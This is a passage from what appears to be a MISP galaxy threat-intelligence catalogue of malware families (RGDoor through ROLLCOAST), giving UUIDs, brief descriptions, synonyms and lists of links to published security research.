- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel - webarchive
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/ - webarchive
- https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent - webarchive
- https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/ - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/ - webarchive
- https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa - webarchive
- https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos - webarchive
- https://vimeo.com/449849549 - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/ - webarchive
- https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil - webarchive
- https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/ - webarchive
- https://twitter.com/VK_Intel/status/1374571480370061312?s=20 - webarchive
- https://twitter.com/alex_il/status/1412403420217159694 - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/ - webarchive
- https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html - webarchive
- https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt - webarchive
- https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html - webarchive
- https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.youtube.com/watch?v=l2P5CMH9TE0 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ironnet.com/blog/ransomware-graphic-blog - webarchive
- https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/ - webarchive
- https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/ - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/ - webarchive
- https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801 - webarchive
- https://twitter.com/fwosar/status/1420119812815138824 - webarchive
- https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/ - webarchive
- https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40 - webarchive
- https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/ - webarchive
- https://twitter.com/Jacob_Pimental/status/1391055792774729728 - webarchive
- https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89 - webarchive
- https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/ - webarchive
- https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/ - webarchive
- https://asec.ahnlab.com/ko/19640/ - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-southfield - webarchive
- https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/ - webarchive
- https://www.cyjax.com/2021/07/09/revilevolution/ - webarchive
- https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html - webarchive
- https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/ - webarchive
- http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/ - webarchive
- https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/ - webarchive
- https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://www.youtube.com/watch?v=QYQQUUpU04s - webarchive
- https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/ - webarchive
- https://analyst1.com/file-assets/History-of-REvil.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RGDoor
Internal MISP references
UUID daddd1dc-c415-4970-89ee-526ee8de2ec1
which can be used as unique global reference for RGDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor - webarchive
- https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-lyceum - webarchive
- https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/ - webarchive
- https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/ - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rhadamanthys
According to PCrisk, Rhadamanthys is a stealer-type malware and, as its name implies, it is designed to extract data from infected machines.
At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Internal MISP references
UUID 50d322d7-c7e0-4d9b-9996-e5767caa8f1c
which can be used as unique global reference for Rhadamanthys
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm - webarchive
- https://www.malware-traffic-analysis.net/2023/01/03/index.html - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques - webarchive
- https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/ - webarchive
- https://www.secureworks.com/research/the-growing-threat-from-infostealers - webarchive
- https://research.checkpoint.com/2024/stargazers-ghost-network/ - webarchive
- https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web - webarchive
- https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://outpost24.com/blog/rhadamanthys-malware-analysis/ - webarchive
- https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/ - webarchive
- https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/ - webarchive
- https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ - webarchive
- https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-latest-rhadamanthys-version/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2024-0926.pdf - webarchive
- https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ - webarchive
- https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Rhdamanthys/Rhadamanthys-EN.pdf - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign - webarchive
- https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rhino
Ransomware.
Internal MISP references
UUID cff6ec82-9d14-4307-9b5b-c0bd17e62f2a
which can be used as unique global reference for Rhino
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RHttpCtrl
Internal MISP references
UUID 5f1bac43-6506-43f0-b5d6-709a39abd671
which can be used as unique global reference for RHttpCtrl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rhysida (Windows)
Internal MISP references
UUID a7d77891-afc2-4be6-b831-a3b2253fb195
which can be used as unique global reference for Rhysida (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rhysida - webarchive
- https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/ - webarchive
- https://www.threatdown.com/blog/rhysida-using-oyster-backdoor-to-deliver-ransomware/ - webarchive
- https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2 - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1009.pdf - webarchive
- https://www.helpnetsecurity.com/2024/02/12/rhysida-ransomware-decryptor/ - webarchive
- https://www.sentinelone.com/blog/rhysida-ransomware-raas-crawls-out-of-crimeware-undergrowth-to-attack-chilean-army/ - webarchive
- https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html - webarchive
- https://www.linkedin.com/posts/prodaft_organic-relationship-between-rhysida-vice-activity-7091777236663427072-NQEs - webarchive
- https://www.secplicity.org/2023/05/23/scratching-the-surface-of-rhysida-ransomware/ - webarchive
- https://fourcore.io/blogs/rhysida-ransomware-history-ttp-adversary-emulation - webarchive
- https://www.shadowstackre.com/analysis/rhysida - webarchive
- https://www.bleepingcomputer.com/news/security/rhysida-ransomware-behind-recent-attacks-on-healthcare/ - webarchive
- https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ - webarchive
- https://www.fortinet.com/blog/threat-research/investigating-the-new-rhysida-ransomware - webarchive
- https://blog.talosintelligence.com/rhysida-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rietspoof
Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.
Internal MISP references
UUID ec67123a-c3bc-4f46-b9f3-569c19e224ca
which can be used as unique global reference for Rietspoof
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/ - webarchive
- https://blog.avast.com/rietspoof-malware-increases-activity - webarchive
- https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rifdoor
Internal MISP references
UUID 2639b71e-1bf1-4cd2-8fa2-9498e893ef3f
which can be used as unique global reference for Rifdoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor - webarchive
- https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://mega.nz/file/lkh1gY5C#93FUlwTwl0y27cfM0jtm4SYnWbtk06d0qoDg1e4eQ6s - webarchive
- http://www.issuemakerslab.com/research3/ - webarchive
- https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rikamanu
Internal MISP references
UUID 6703e8ce-2c5e-4a9d-96b4-49e90074b043
which can be used as unique global reference for Rikamanu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rincux
Internal MISP references
UUID 383021b9-fcf9-4c21-a0e2-d75fb8c0727a
which can be used as unique global reference for Rincux
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ripper ATM
Internal MISP references
UUID a85b0619-ed8e-4324-8603-af211d682dac
which can be used as unique global reference for Ripper ATM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RisePro
RisePro is a stealer that is spread through downloaders like win.privateloader. Once executed on a system, the malware can steal credit card information, passwords, and personal data.
Internal MISP references
UUID 20ba0ede-454c-461d-a0e1-c053a838faa2
which can be used as unique global reference for RisePro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro - webarchive
- https://embee-research.ghost.io/identifying-risepro-panels-using-censys/ - webarchive
- https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/ - webarchive
- https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service - webarchive
- https://www.gdatasoftware.com/blog/2024/03/37885-risepro-stealer-campaign-github - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://research.checkpoint.com/2024/stargazers-ghost-network/ - webarchive
- https://blog.sekoia.io/new-risepro-stealer-distributed-by-the-prominent-privateloader/ - webarchive
- https://www.linkedin.com/posts/threatmon_risepro-stealer-malware-analysis-report-ugcPost-7180497665137221633-aUGL?utm_source=share&utm_medium=member_desktop - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rising Sun
Internal MISP references
UUID 148a7078-3a38-4974-8990-9d5881f8267b
which can be used as unique global reference for Rising Sun
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun - webarchive
- https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/ - webarchive
- https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RM3
Created from the codebase of Gozi/ISFB.
Internal MISP references
UUID dec5b601-16b5-439a-8b2a-4ebc7ec31de5
which can be used as unique global reference for RM3
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RMS
CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by the Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as in numerous smaller campaigns likely attributable to other, disparate threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RMS.
Known Synonyms |
---|
Gussdoor |
Remote Manipulator System |
RuRAT |
Internal MISP references
UUID 94339b04-9332-4691-b820-5021368f1d3a
which can be used as unique global reference for RMS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rms - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/ - webarchive
- https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf - webarchive
- https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf - webarchive
- https://awakesecurity.com/blog/catching-the-white-stork-in-flight/ - webarchive
- https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://blog.yoroi.company/research/ta505-is-expanding-its-operations/ - webarchive
- https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ROADSWEEP
Internal MISP references
UUID 4dee0861-e19d-42ee-a68e-c08c39146407
which can be used as unique global reference for ROADSWEEP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RoarBAT
According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file extensions from a disk.
Internal MISP references
UUID 7ef66505-9b5b-4a80-af64-b51dc7a006ba
which can be used as unique global reference for RoarBAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RobinHood
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RobinHood.
Known Synonyms |
---|
RobbinHood |
Internal MISP references
UUID 6f3469f6-7a56-4ba3-a340-f10746390226
which can be used as unique global reference for RobinHood
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood - webarchive
- https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf - webarchive
- https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/ - webarchive
- https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/ - webarchive
- https://twitter.com/VK_Intel/status/1121440931759128576 - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/ - webarchive
- https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/ - webarchive
- https://goggleheadedhacker.com/blog/post/12 - webarchive
- https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/ - webarchive
- https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/ - webarchive
- https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf - webarchive
- https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/ - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/ - webarchive
- https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rock
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular rock.
Known Synonyms |
---|
yellowalbatross |
Internal MISP references
UUID 95a26977-295f-4843-ad11-a3d9dcb6c192
which can be used as unique global reference for rock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rockloader
Internal MISP references
UUID 1482ffff-47a8-46da-8f47-d363c9d86c0e
which can be used as unique global reference for Rockloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rofin
Internal MISP references
UUID bd7b1628-2aeb-44c5-91e7-f02c011034cf
which can be used as unique global reference for Rofin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RogueRobinNET
A .NET variant of ps1.roguerobin.
Internal MISP references
UUID 25b08d2e-f803-4520-9518-4d95ce9f6ed4
which can be used as unique global reference for RogueRobinNET
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin - webarchive
- https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/ - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rokku
Internal MISP references
UUID 38f57823-ccc2-424b-8140-8ba30325af9c
which can be used as unique global reference for Rokku
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RokRAT
It is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RokRAT.
Known Synonyms |
---|
DOGCALL |
Internal MISP references
UUID 16dcc67b-4415-4620-818d-7ca24a5ccaf5
which can be used as unique global reference for RokRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat - webarchive
- https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf - webarchive
- https://www.0x0v1.com/rearchive-rokrat-hwp/ - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ - webarchive
- https://asec.ahnlab.com/en/51751/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/ - webarchive
- http://blog.talosintelligence.com/2017/04/introducing-rokrat.html - webarchive
- https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab - webarchive
- https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247496455&idx=1&sn=0e3af7d734671a41c9d796e7f33b085d&chksm=f9ed9fb8ce9a16ae8e9714f116e0812994e0e3d13eb75d05182e623372fc5b979d70cf403f39&scene=178&cur_album_id=1375769135073951745 - webarchive
- https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/ - webarchive
- http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf - webarchive
- https://asec.ahnlab.com/en/65076/ - webarchive
- https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html - webarchive
- https://twitter.com/ESETresearch/status/1575103839115804672 - webarchive
- https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/ - webarchive
- http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf - webarchive
- https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48 - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/ - webarchive
- https://www.ibm.com/downloads/cas/Z81AVOY7 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://threatmon.io/reverse-engineering-rokrat-a-closer-look-at-apt37s-onedrive-based-attack-vector/ - webarchive
- http://v3lo.tistory.com/24 - webarchive
- https://unit42.paloaltonetworks.com/atoms/moldypisces/ - webarchive
- https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/ - webarchive
- https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/ - webarchive
- https://www.youtube.com/watch?v=uoBQE5s2ba4 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ROLLCOAST
ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Link Library (DLL) with no named exports. When observed by Mandiant, it had only a single export, ordinal 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ROLLCOAST.
Known Synonyms |
---|
Arcane |
S4bb47h |
Sabbath |
Internal MISP references
UUID a3178bd5-719b-4065-9a55-d13bb34e5c14
which can be used as unique global reference for ROLLCOAST
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RollSling
Internal MISP references
UUID 40a0d770-21bd-4561-aba0-bfe000bc18b0
which can be used as unique global reference for RollSling
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rombertik
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rombertik.
Known Synonyms |
---|
CarbonGrabber |
Internal MISP references
UUID ab5066b4-d5ff-4f83-9a05-6e74c043a6e1
which can be used as unique global reference for Rombertik
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ROMCOM RAT
